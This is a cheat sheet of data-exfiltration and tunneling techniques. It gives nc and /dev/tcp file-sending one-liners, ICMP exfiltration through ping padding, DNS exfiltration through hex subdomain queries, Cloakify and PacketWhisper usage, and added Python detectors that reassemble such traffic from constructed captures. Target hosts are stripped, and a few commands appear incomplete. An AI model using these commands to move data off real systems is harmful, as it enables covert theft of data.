Data Exfiltration and Protocol Tunneling

Exfiltration #

At a Glance #

Data exfiltration, also called data extrusion or data exportation, is the unauthorized transfer of data from a device or network. [1]

Encoding #

Base64 #

Linux encoding/decoding.

cat filename.ext | base64 -w0
cat filename.ext | base64 -d
  • -w <col>: wrap encoded lines after <col> characters (default 76; 0 disables wrapping).
  • -d: decode data.

Windows encoding/decoding.

certutil -encode filename.ext output.ext
certutil -decode filename.ext output.ext

Steganography #

Cloakify [2] #

python ./ filename.ext ./ciphers/topWebsites


python ./cloakifyFactory

File Transfer #

wget (recursive) #

wget -r
  • -r: Specify recursive download.

curl #

curl -o filename.ext
  • -o <file>: Write to <file> instead of stdout.

scp #

scp user@ .

nc #

# Receiver
nc -nvlp 1234 > filename.ext
# Sender
nc -nv 1234 < filename.ext
  • -n: don’t do DNS lookups.
  • -v: print status messages.
  • -l: listen.
  • -p <port>: local port used for listening.

/dev/tcp [3] #

# Receiver
nc -nvlp 1234 > filename.ext
# Sender
cat filename.ext > /dev/tcp/
# Sender
nc -w5 -nvlp 1234 < filename.ext
# Receiver
exec 6< /dev/tcp/
cat <&6 > filename.ext

Web Servers #

Python #

python -m SimpleHTTPServer 1234
python3 -m http.server 1234

Simple HTTP Server with File Upload

Ruby #

ruby -run -e httpd . -p1234
ruby -r webrick -e 'WEBrick::HTTPServer.new(:Port => 1234, :DocumentRoot => Dir.pwd).start'

Perl #

perl -MHTTP::Daemon -e '$d = HTTP::Daemon->new(LocalPort => 1234) or die $!; while($c = $d->accept){while($r = $c->get_request){$c->send_file_response(".".$r->url->path)}}'

Note: Install HTTP::Daemon if not present with: sudo cpan HTTP::Daemon

PHP #

php -S

NodeJS #


npm install -g http-server
http-server -p 1234


npm install -g node-static
static -p 1234

FTP Servers #

Python #

pip install pyftpdlib
python3 -m pyftpdlib -p 1234

NodeJS #

npm install -g ftp-srv
ftp-srv --root ./

Tunneling #

ICMP #
Capture ICMP packets with the following script:

Generate ICMP packets from the file hexdump.

xxd -p -c 8 filename.ext | while read h; do ping -c 1 -p $h; done

xxd options:
  • -p: Output in PostScript continuous hexdump style, also known as plain hexdump style.
  • -c <cols>: Format <cols> octets per line.

ping options:
  • -c <count>: Stop after sending <count> ECHO_REQUEST packets.
  • -p <pattern>: Up to 16 “pad” bytes (given in hex) used to fill out the packet you send.

Note: Match xxd columns (-c 8) with the data sliced (packet[ICMP].load[-8:]) in the script.
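The capture script referred to above is not reproduced on this page. The following is an added example, not the page's own script, showing the analyst side of the same idea: parse ICMP echo requests from raw IPv4 packets, take the last 8 bytes of each payload (the `load[-8:]` slice the note talks about, matched to `xxd -c 8`), and reassemble them per source host. It also adds the check a defender wants: a host whose echo-request padding changes from ping to ping, which an ordinary ping run never does. The packets, addresses and payload are constructed inline; the IP checksum is left at zero because the parser does not need it.

```python
# Added example (not the page's capture script): reassemble the padding bytes that
# "ping -p" places in ICMP echo requests and flag hosts whose padding changes between
# pings. Works on raw IPv4 packets without a link-layer header; the packets below are
# constructed in-line, and the IP/ICMP fields are built only as far as parsing needs.
import struct
from collections import defaultdict


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum (used here for the ICMP header)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src: str, dst: str, pad: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Constructed sample packet mimicking Linux 'ping -p <hex>': an 8-byte timestamp
    followed by the pad pattern repeated to fill 56 data bytes (IP checksum left zero)."""
    timestamp = b"\x00" * 8                       # real ping stores a struct timeval here
    fill = (pad * (48 // len(pad) + 1))[:48]      # ping repeats the pattern across the data
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + timestamp + fill
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip_src = bytes(int(o) for o in src.split("."))
    ip_dst = bytes(int(o) for o in dst.split("."))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0, ip_src, ip_dst)
    return ip_hdr + icmp


def echo_requests(packets):
    """Yield (src_ip, sequence, icmp_payload) for every ICMP echo request in `packets`."""
    for pkt in packets:
        ihl = (pkt[0] & 0x0F) * 4
        if pkt[9] != 1:                           # IP protocol 1 = ICMP
            continue
        icmp = pkt[ihl:]
        icmp_type, _code, _csum, _ident, seq = struct.unpack("!BBHHH", icmp[:8])
        if icmp_type != 8:                        # 8 = echo request
            continue
        yield ".".join(str(b) for b in pkt[12:16]), seq, icmp[8:]


def reassemble_padding(packets, chunk: int = 8) -> dict:
    """Per source host, concatenate the last `chunk` payload bytes of each echo request in
    sequence order; `chunk` must match the xxd column width used by the sender."""
    pieces = defaultdict(list)
    for src, seq, payload in echo_requests(packets):
        pieces[src].append((seq, payload[-chunk:]))
    return {src: b"".join(tail for _, tail in sorted(items)) for src, items in pieces.items()}


def varying_padding_hosts(packets, chunk: int = 8) -> list:
    """Detection heuristic: an ordinary ping run keeps one fixed fill pattern, so a host whose
    echo-request tails differ from packet to packet is worth a closer look."""
    tails = defaultdict(set)
    for src, _seq, payload in echo_requests(packets):
        tails[src].add(payload[-chunk:])
    return sorted(src for src, seen in tails.items() if len(seen) > 1)


# Constructed capture: one host carrying 16 bytes in two pings, one host pinging normally
# with the default iputils fill (byte values 0x08..0x37 after the timestamp).
SECRET = b"ExfilTestData123"
SAMPLE = [build_echo_request("10.0.0.5", "10.0.0.1", SECRET[i:i + 8], seq=i // 8 + 1)
          for i in range(0, len(SECRET), 8)]
SAMPLE += [build_echo_request("10.0.0.7", "10.0.0.1", bytes(range(8, 56)), seq=s) for s in (1, 2)]

if __name__ == "__main__":
    print("hosts with varying padding:", varying_padding_hosts(SAMPLE))
    for host, data in reassemble_padding(SAMPLE).items():
        print(host, data)
```

To run this against a real capture, feed `echo_requests` the IPv4 packets from a pcap (strip the link-layer header first). The `chunk` parameter is the point of the note: if the sender used `xxd -c 16`, the slice has to be 16 bytes or the reassembly is garbage.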

DNS #

Capture DNS packet data.

sudo tcpdump -n -i wlan0 -w dns_exfil.pcap udp and src and port 53

Note: Remember to point the DNS resolution to where packets are being captured.

Generate DNS queries.

xxd -p -c 16 filename.ext | while read h; do ping -c 1 ${h}; done

Extract exfiltrated data.

tcpdump -r dns_exfil.pcap 2>/dev/null | sed -e 's/.*\ \([A-Za-z0-9+/]*\)*/\1/' | uniq | paste -sd "" - | xxd -r -p
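The same extraction done on parsed DNS messages rather than on tcpdump's text output, as an added example that is not the page's own pipeline. It keeps the `uniq` step (resolver retries repeat a query) and the `paste | xxd -r -p` step, and adds a detection angle: a parent domain that keeps receiving distinct hex-only subdomains. The parent domain `exfil.example.test`, the benign lookups and the payload are constructed; the parser assumes one question per message and no name compression in the question section.

```python
# Added example, not the page's own pipeline: the DNS equivalent of the tcpdump/sed/xxd
# extraction above, done on parsed DNS messages so the same logic can double as a detector.
# Assumptions: the parent domain name "exfil.example.test" and the queries are constructed
# here; one question per message, no name compression in the question section.
import binascii
import re
import struct
from collections import defaultdict


def build_query(qname: str, txid: int = 0x1A2B) -> bytes:
    """Constructed sample: a standard recursive A query for qname in RFC 1035 wire format."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)   # QTYPE A, QCLASS IN


def parse_qname(msg: bytes) -> list:
    """Return the labels of the first question name (lower-cased; DNS names are case-insensitive)."""
    labels, pos = [], 12
    while msg[pos] != 0:
        n = msg[pos]
        labels.append(msg[pos + 1:pos + 1 + n].decode("ascii", "replace").lower())
        pos += 1 + n
    return labels


# xxd -p -c 16 emits 32 hex characters per query; the final chunk can be shorter,
# so accept any even-length hex label of at least 8 characters.
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){4,}$")


def hex_label_queries(msgs) -> dict:
    """Group the leading hex-looking label of each query by its parent domain, in capture
    order, dropping immediate repeats the way 'uniq' does for resolver retries."""
    grouped = defaultdict(list)
    for msg in msgs:
        labels = parse_qname(msg)
        if len(labels) < 2 or not HEX_LABEL.match(labels[0]):
            continue
        parent = ".".join(labels[1:])
        if not grouped[parent] or grouped[parent][-1] != labels[0]:
            grouped[parent].append(labels[0])
    return grouped


def flag_domains(msgs, threshold: int = 3) -> list:
    """Detection heuristic: parent domains that received at least `threshold` distinct
    hex-only subdomains; ordinary hostnames rarely look like that repeatedly."""
    return sorted(d for d, labels in hex_label_queries(msgs).items() if len(set(labels)) >= threshold)


def reassemble(msgs, domain: str) -> bytes:
    """Concatenate the hex labels seen for `domain` and decode them, like 'paste -sd "" | xxd -r -p'."""
    return binascii.unhexlify("".join(hex_label_queries(msgs).get(domain, [])))


# Constructed capture: 40 bytes chunked like 'xxd -p -c 16', one retry, and benign lookups.
DATA = b"constructed sample payload for dns exfil"
CHUNKS = [DATA[i:i + 16].hex() for i in range(0, len(DATA), 16)]
SAMPLE_QUERIES = [build_query("www.example.test")]
for h in CHUNKS:
    SAMPLE_QUERIES.append(build_query(h + ".exfil.example.test"))
SAMPLE_QUERIES.insert(3, build_query(CHUNKS[1] + ".exfil.example.test"))  # resolver retry
SAMPLE_QUERIES.append(build_query("mail.example.test"))

if __name__ == "__main__":
    for domain in flag_domains(SAMPLE_QUERIES):
        print(domain, reassemble(SAMPLE_QUERIES, domain))
```

The `threshold` is what keeps a single legitimately hex-looking hostname from triggering; tune it to the query volume of the resolver you are watching. Only the leading label is inspected here, so tools that spread data over several labels would need `labels[:-k]` joined instead.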

PacketWhisper [4] #

Capture packets with tcpdump, as described above. Cloak, exfiltrate and decloak from the CLI.


Further Reading #

  1. “Exfiltration, Tactic TA0010 - Enterprise.” MITRE ATT&CK.

  2. TryCatchHCF. “TryCatchHCF/Cloakify: CloakifyFactory.” GitHub.

  3. “/Dev.” The Linux Documentation Project.

  4. TryCatchHCF. “PacketWhisper.” GitHub.